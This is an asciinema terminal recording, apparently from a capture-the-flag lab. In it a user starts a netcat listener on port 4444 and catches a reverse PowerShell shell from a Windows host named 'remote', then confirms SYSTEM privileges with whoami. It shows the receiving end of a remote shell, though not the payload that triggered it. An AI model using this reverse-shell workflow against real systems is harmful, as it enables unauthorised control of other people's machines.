{"version": 2, "width": 150, "height": 34, "timestamp": 1584871553, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.157097, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.158128, "o", "\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[0.188513, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[0.188617, "o", "\u001b[?1h\u001b="]
[0.188739, "o", "\u001b[?2004h"]
[1.331207, "o", "n"]
[1.453272, "o", "\bnc"]
[1.550478, "o", " "]
[2.033646, "o", "-"]
[2.440192, "o", "n"]
[2.704279, "o", "l"]
[3.053576, "o", "v"]
[3.273205, "o", "p"]
[3.499865, "o", " "]
[3.738595, "o", "4"]
[3.936871, "o", "4"]
[4.0779, "o", "4"]
[4.438145, "o", "4"]
[4.975832, "o", "\u001b[?1l\u001b>"]
[4.976175, "o", "\u001b[?2004l\r\r\n"]
[4.97673, "o", "\u001b]2;nc -nlvp 4444\u0007\u001b]1;nc\u0007"]
[4.980726, "o", "listening on [any] 4444 ...\r\n"]
[19.756547, "o", "connect to [10.10.15.107] from (UNKNOWN) [10.10.10.180] 49701\r\n"]
[29.096986, "o", "Windows PowerShell \r\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\r\n\r\r\n"]
[29.796278, "o", "PS C:\\Windows\\system32> "]
[31.986394, "o", "w"]
[32.506377, "o", "h"]
[32.746534, "o", "o"]
[33.111853, "o", "a"]
[33.278415, "o", "m"]
[33.508742, "o", "i"]
[33.779191, "o", "\r\n"]
[34.448402, "o", "whoami\r\r\n"]
[34.73753, "o", "nt authority\\system\r\r\n"]
[35.096825, "o", "PS C:\\Windows\\system32> "]
[36.042622, "o", "h"]
[36.379765, "o", "o"]
[36.623517, "o", "s"]
[36.944609, "o", "t"]
[37.31277, "o", "n"]
[37.457175, "o", "a"]
[37.610494, "o", "m"]
[37.735861, "o", "e"]
[37.916606, "o", "\r\n"]
[39.737004, "o", "hostname\r\r\n"]
[44.440029, "o", "remote\r\r\n"]
[55.364335, "o", "^C\r\n"]
[55.364748, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[55.365122, "o", "\u001b]2;root@parrot: /home/prashant\u0007"]
[55.365807, "o", "\u001b]1;/home/prashant\u0007"]
[55.399536, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[55.399923, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[55.756577, "o", "e"]
[56.021998, "o", "\bex"]
[56.2105, "o", "i"]
[56.422283, "o", "t"]
[56.571903, "o", "\u001b[?1l\u001b>"]
[56.572263, "o", "\u001b[?2004l\r\r\n"]
[56.572924, "o", "\u001b]2;exit\u0007\u001b]1;exit\u0007"]
